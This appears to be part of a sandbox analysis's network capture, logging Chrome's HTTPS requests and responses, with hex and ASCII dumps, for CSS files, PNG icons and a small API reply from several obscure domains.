                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://brhrjf.yuhu06.xyz/061410/rcenter/msites/themes/default/common.css?v=1717580749344
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC626INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 227
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-CHANGZ-MP-01-23
                                                                                                                                                          ETag: "655579ca-e3"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:20 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;changzmp01:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-CHANGZ-MP-01-23
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-05
                                                                                                                                                          X-Cdn-Request-ID: 9130e8cddb959ff2cf395260937ef955
                                                                                                                                                          2024-06-09 22:41:20 UTC227INData Raw: 2e 6d 6f 64 61 6c 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 6d 6f 64 61 6c 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 63 6f 6e 74 65 6e 74 3a 22 20 22 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 6d 6f 64 61 6c 2d 64 69 61 6c 6f 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 74 72 2d 73 65 6c 65 63 74 65 64 2d 72 6f 77 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 36 66 33 66 63 7d
                                                                                                                                                          Data Ascii: .modal{text-align:center}.modal:before{display:inline-block;vertical-align:middle;content:" ";height:100%}.modal-dialog{display:inline-block;text-align:left;vertical-align:middle}.tr-selected-row-color{background-color:#e6f3fc}


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          549192.168.2.55032623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC612OUTGET /pc/image-pc/index/382/footer/icon_sport.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:19 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 3109
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:12 GMT
                                                                                                                                                          ETag: "64c0a208-c25"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE30[3],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473790
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 07c314dfb34555aca7dda87ecd508b96
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118210
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC3109INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 06 00 00 00 8c 45 6a dd 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 29 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR66EjtEXtSoftwareAdobe ImageReadyqe<)iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          550192.168.2.550329170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC458OUTGET /mt-cloud/api/sn.maintain.list HTTP/1.1
                                                                                                                                                          Host: ahd-ocssn.qqxgo.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: aliyungf_tc=3de529fcf893d6d3ee212d9780b2d6d818dae7d7247c306b9d3885f4ac9f9c38
                                                                                                                                                          2024-06-09 22:41:20 UTC369INHTTP/1.1 200
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Length: 18
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Tengine/2.3.0
                                                                                                                                                          Vary: Origin
                                                                                                                                                          Vary: Access-Control-Request-Method
                                                                                                                                                          Vary: Access-Control-Request-Headers
                                                                                                                                                          api-elapsed: 0
                                                                                                                                                          x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:20 UTC18INData Raw: 72 65 71 75 65 73 74 2d 65 6d 70 74 79 2d 37 37 37 0a
                                                                                                                                                          Data Ascii: request-empty-777


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          551192.168.2.55033090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC649OUTGET /pc/image-pc/index/383/menu/nv3.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1790
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:21 GMT
                                                                                                                                                          ETag: "64bf926d-6fe"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE17[3],EU-FRA-paris-GLOBAL1-CACHE16[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467539
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: bd2238c09ca9610b64a1d35c9e16400f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124461
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC1790INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1a 00 00 00 1a 08 06 00 00 00 a9 4a 4c ce 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRJLtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          552192.168.2.55033323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC377OUTGET /pc/image-pc/index/383/menu/nv1.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1591
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:20 GMT
                                                                                                                                                          ETag: "64bf926c-637"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE11[3],EU-FRA-paris-GLOBAL1-CACHE1[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464730
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 30e23f65972f2a7ae4bac19d5bf8ff99
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127270
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC1591INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 19 08 06 00 00 00 22 c0 4e 27 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDR"N'tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          553192.168.2.55033190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC649OUTGET /pc/image-pc/index/383/menu/nv4.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC613INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 977
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:21 GMT
                                                                                                                                                          ETag: "64bf926d-3d1"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE5[4],EU-FRA-paris-GLOBAL1-CACHE20[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467539
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 3ba4c1f20e3b92aa18fc659324698065
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124461
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC977INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1c 00 00 00 1c 08 06 00 00 00 72 0d df 94 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 03 83 49 44 41 54 48 89 a5 96 5d 68 14 57 14 c7 7f 99 bb bb 50 f1 8b 3e 35 42 2a 2d 62 1f d4 36 a9 5a 4c 21 18 6d 26 0a 92 a2 b0 88 12 08 e4 a5 83 79 29 b1 d0 5a 62 2c 31 06 aa 98 e6 2d e9 16 34 10 11 44 a7 f5 41 90 96 59 63 34 d6 24 68 49 cd 4a 4a 5e 8a 54 29 8a 7d 10 ad cc 4c ee ce 6e 1f 76 26 4c 66 67 36 9b ed 81 03 33 f7 fc cf fd dd ef 7b ab a8 c0 8c 54 b2 1a e8 00 de 04 66 81 0c 30 a3 6a fa 8b a5 72 ab 2a 80 29 2e e4 bd 90 f0 13 17 ee f7 3f 54 4d 9f ff 3f c0 b7 81 87 c0 aa 32 53 b2 c0 1c f0 23 70 72 d9 40 17 1a 07 3e 07 4e 03 ca 32 52 3b 62 65 02 56 02 8d c0 27 40 0d f0 93 aa e9 67 8d
                                                                                                                                                          Data Ascii: PNGIHDRrpHYsIDATH]hWP>5B*-b6ZL!m&y)Zb,1-4DAYc4$hIJJ^T)}Lnv&Lfg63{Tf0jr*).?TM?2S#pr@>N2R;beV'@g


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          554192.168.2.55033423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC377OUTGET /pc/image-pc/index/383/menu/nv2.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1545
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:21 GMT
                                                                                                                                                          ETag: "64bf926d-609"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE24[2],EU-FRA-paris-GLOBAL1-CACHE27[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464730
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: cd1f020143f1f1e78fb5c392cc798ec6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127270
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC1545INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 19 00 00 00 1a 08 06 00 00 00 42 7d f7 cd 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRB}tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          555192.168.2.550325183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:19 UTC655OUTGET /061410/rcenter/common/themes/default/bootstrap/bootstrap.css HTTP/1.1
                                                                                                                                                          Host: brhrjf.yuhu06.xyz
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://brhrjf.yuhu06.xyz/061410/rcenter/msites/themes/default/common.css?v=1717580749344
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC675INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 117593
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XIANY-MP-05-18
                                                                                                                                                          ETag: "655579ca-1cb59"
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Last-Modified: Thu, 16 Nov 2023 02:09:14 GMT
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:41:20 GMT
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-206
                                                                                                                                                          x-link-via: dgct63:443;xianymp05:80;
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-XIANY-MP-05-18
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-25
                                                                                                                                                          X-Cdn-Request-ID: 363544cdbb01eabf953eaaffda53cd28
                                                                                                                                                          2024-06-09 22:41:20 UTC15709INData Raw: 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 34 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 35 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 33 2e 30 2e 32 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66
                                                                                                                                                          Data Ascii: /*! * Bootstrap v3.3.4 (http://getbootstrap.com) * Copyright 2011-2015 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) *//*! normalize.css v3.0.2 | MIT License | git.io/normalize */html{font-family:sans-serif
